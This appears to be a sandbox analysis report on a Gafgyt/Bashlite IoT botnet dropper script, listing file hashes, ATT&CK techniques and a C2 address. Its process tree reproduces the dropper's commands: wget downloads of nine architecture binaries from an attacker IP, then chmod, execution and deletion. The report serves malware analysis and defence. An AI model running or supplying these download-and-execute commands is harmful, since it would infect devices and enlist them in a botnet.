gafgyt | d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779

Analysis

max time kernel
60s
max time network
62s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
28/09/2024, 07:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

sex.sh
Size

1KB
MD5

884dc57dd0892038d53a2d4b017504df
SHA1

52ab9780591ee9718ce6188a9edafc1afa05dcdf
SHA256

d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
SHA512

25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca

Score

10^/10

gafgyt botnet defense_evasion discovery

Malware Config

Extracted

Family

gafgyt

205.185.127.244:23

Signatures

Detected Gafgyt variant 9 IoCs

resource	yara_rule
behavioral4/files/fstream-1.dat	family_gafgyt
behavioral4/files/fstream-2.dat	family_gafgyt
behavioral4/files/fstream-3.dat	family_gafgyt
behavioral4/files/fstream-4.dat	family_gafgyt
behavioral4/files/fstream-5.dat	family_gafgyt
behavioral4/files/fstream-6.dat	family_gafgyt
behavioral4/files/fstream-7.dat	family_gafgyt
behavioral4/files/fstream-8.dat	family_gafgyt
behavioral4/files/fstream-9.dat	family_gafgyt

Gafgyt/Bashlite
IoT botnet with numerous variants first seen in 2014.
botnet gafgyt

File and Directory Permissions Modification 1 TTPs 10 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
866	chmod
818	chmod
826	chmod
841	chmod
851	chmod
856	chmod
861	chmod
831	chmod
836	chmod
846	chmod

Executes dropped EXE 9 IoCs

ioc	pid	Process
/tmp/mips	819	mips
/tmp/mipsel	827	mipsel
/tmp/sh4	832	sh4
/tmp/x86	837	x86
/tmp/arm61	842	arm61
/tmp/i686	847	i686
/tmp/ppc	852	ppc
/tmp/586	857	586
/tmp/m68k	862	m68k

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	mips
File opened for modification	/dev/misc/watchdog	mips

Changes its process name 1 IoCs

description	pid	Process
Changes the process name, possibly in an attempt to hide itself	819	mips

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
824	wget
827	mipsel
829	rm
716	wget
819	mips
822	rm

Writes file to tmp directory 9 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/i686	wget
File opened for modification	/tmp/ppc	wget
File opened for modification	/tmp/mipsel	wget
File opened for modification	/tmp/x86	wget
File opened for modification	/tmp/arm61	wget
File opened for modification	/tmp/m68k	wget
File opened for modification	/tmp/mips	wget
File opened for modification	/tmp/sh4	wget
File opened for modification	/tmp/586	wget

/tmp/sex.sh
/tmp/sex.sh
1⤵
PID:712
- /usr/bin/wget
  wget http://205.185.127.244/mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:716
- /bin/chmod
  chmod +x mips
  2⤵
  - File and Directory Permissions Modification
  PID:818
- /tmp/mips
  ./mips
  2⤵
  - Executes dropped EXE
  - Modifies Watchdog functionality
  - Changes its process name
  - System Network Configuration Discovery
  PID:819
- /bin/rm
  rm -rf mips
  2⤵
  - System Network Configuration Discovery
  PID:822
- /usr/bin/wget
  wget http://205.185.127.244/mipsel
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:824
- /bin/chmod
  chmod +x mipsel
  2⤵
  - File and Directory Permissions Modification
  PID:826
- /tmp/mipsel
  ./mipsel
  2⤵
  - Executes dropped EXE
  - System Network Configuration Discovery
  PID:827
- /bin/rm
  rm -rf mipsel
  2⤵
  - System Network Configuration Discovery
  PID:829
- /usr/bin/wget
  wget http://205.185.127.244/sh4
  2⤵
  - Writes file to tmp directory
  PID:830
- /bin/chmod
  chmod +x sh4
  2⤵
  - File and Directory Permissions Modification
  PID:831
- /tmp/sh4
  ./sh4
  2⤵
  - Executes dropped EXE
  PID:832
- /bin/rm
  rm -rf sh4
  2⤵
  PID:834
- /usr/bin/wget
  wget http://205.185.127.244/x86
  2⤵
  - Writes file to tmp directory
  PID:835
- /bin/chmod
  chmod +x x86
  2⤵
  - File and Directory Permissions Modification
  PID:836
- /tmp/x86
  ./x86
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm -rf x86
  2⤵
  PID:839
- /usr/bin/wget
  wget http://205.185.127.244/arm61
  2⤵
  - Writes file to tmp directory
  PID:840
- /bin/chmod
  chmod +x arm61
  2⤵
  - File and Directory Permissions Modification
  PID:841
- /tmp/arm61
  ./arm61
  2⤵
  - Executes dropped EXE
  PID:842
- /bin/rm
  rm -rf arm61
  2⤵
  PID:844
- /usr/bin/wget
  wget http://205.185.127.244/i686
  2⤵
  - Writes file to tmp directory
  PID:845
- /bin/chmod
  chmod +x i686
  2⤵
  - File and Directory Permissions Modification
  PID:846
- /tmp/i686
  ./i686
  2⤵
  - Executes dropped EXE
  PID:847
- /bin/rm
  rm -rf i686
  2⤵
  PID:849
- /usr/bin/wget
  wget http://205.185.127.244/ppc
  2⤵
  - Writes file to tmp directory
  PID:850
- /bin/chmod
  chmod +x ppc
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/ppc
  ./ppc
  2⤵
  - Executes dropped EXE
  PID:852
- /bin/rm
  rm -rf ppc
  2⤵
  PID:854
- /usr/bin/wget
  wget http://205.185.127.244/586
  2⤵
  - Writes file to tmp directory
  PID:855
- /bin/chmod
  chmod +x 586
  2⤵
  - File and Directory Permissions Modification
  PID:856
- /tmp/586
  ./586
  2⤵
  - Executes dropped EXE
  PID:857
- /bin/rm
  rm -rf 586
  2⤵
  PID:859
- /usr/bin/wget
  wget http://205.185.127.244/m68k
  2⤵
  - Writes file to tmp directory
  PID:860
- /bin/chmod
  chmod +x m68k
  2⤵
  - File and Directory Permissions Modification
  PID:861
- /tmp/m68k
  ./m68k
  2⤵
  - Executes dropped EXE
  PID:862
- /bin/rm
  rm -rf m68k
  2⤵
  PID:864
- /usr/bin/wget
  wget http://205.185.127.244/dc
  2⤵
  PID:865
- /bin/chmod
  chmod +x dc
  2⤵
  - File and Directory Permissions Modification
  PID:866

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/586

Filesize
107KB

MD5
878511883ecf938a9b30e0a5eebb1b78

SHA1
6f4192c09680a8cdec1c33fec77e40a96faeee15

SHA256
777ff84d65d53fb8da3f25c4c303cb6f6505ee534e8bdbd936c1f9e60e70a533

SHA512
8ea3f989940b431a6b994374fc322a0eb7933fe6791e947a573ad3e7d26f6a4ee8c72ae4d79e6d23be5f152df4e29934bb7e623a7530ac2752f4c6e3cf0181a4

Download Submit
/tmp/arm61

Filesize
174KB

MD5
00c59b56e0ef93ffa2eacb7ffc355bc6

SHA1
e9f1a9fa3f2d7e9b8d40129dea37e82746609cea

SHA256
e0fa297f5c991e85f42412776055dda158fb18d7d69ff51e2b5430291f1746c7

SHA512
063a3293125b6981bafe1409bbf2b06ce21496a18496a39a4837f1bdad73e8dfb590118a1eab50e50504ef884a389e516090f485f7381c68f3233d290cdbadcf

Download Submit
/tmp/i686

Filesize
111KB

MD5
9528d0e8ca08dae17e7e19ef7d13e035

SHA1
5d1ff7764e03718af5ebe432c9b8d0d2e1d057ee

SHA256
53c2bfcfa15435d366b80b96946fe5cff049453b086cd255faf0968d55605f1e

SHA512
72d6cd79bf99d095ee7009c3ff6569d7fbc0b950207aac061c4a289f9e89027519e1d7fa25f778a3131c0f57743ccdec5c30d4ebb8eabaa48ed61ceb18c4030e

Download Submit
/tmp/m68k

Filesize
129KB

MD5
5f4fef5c575e8b3b11d8475dd4de719a

SHA1
273104250032ebdc02e19b05bcf2b5b682e27368

SHA256
b909016b579dfc65db56aac511f68f0ed62ef87b14c4819278ad9dc67cf68338

SHA512
7103b1af22a821297fc1aab82e128936e306059ed055d979e5af418cc8e21ead7f2d28988816b8709be733a36eaccaca0a5d3f0fd17983400cb5e3daeb907e89

Download Submit
/tmp/mips

Filesize
176KB

MD5
24e07a16008a42f0a8dceb166b4b44cd

SHA1
87f80fc2998304bc8735479faa75f509a6d5db13

SHA256
c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f

SHA512
b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5

Download Submit
/tmp/mipsel

Filesize
176KB

MD5
ac28a3dfa3ed9b815a8021a362b06607

SHA1
93455b3775f586e230d8879489f9a6062de70677

SHA256
3d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5

SHA512
94c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e

Download Submit
/tmp/ppc

Filesize
128KB

MD5
184c7d44649ab256bd5705724bbec6a1

SHA1
baa0a75bd81f5985eb42ad0bdc282405b66af67d

SHA256
3a6f6b23c30602cfd2328e7a6972fcc29423e4ed67a1b854d108b7711992ec58

SHA512
ec1cd34debb06ce5c1571582f26b433ee34c7959fa1d1af0e1e6a0f9834f3d277916e8128d1b73ad569df89e7576b3b9a1a112dd08f10ddee00e30e821ffaa43

Download Submit
/tmp/sh4

Filesize
123KB

MD5
5ec3c0e18b6fbc6e37bd611e2df8f9a4

SHA1
de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d

SHA256
9b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6

SHA512
76f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20

Download Submit
/tmp/x86

Filesize
127KB

MD5
678363120cd2661f040670b90f211243

SHA1
57d75e1c42243d08eb78623e6cdc6b066994a7ee

SHA256
cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a

SHA512
5a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55

Download Submit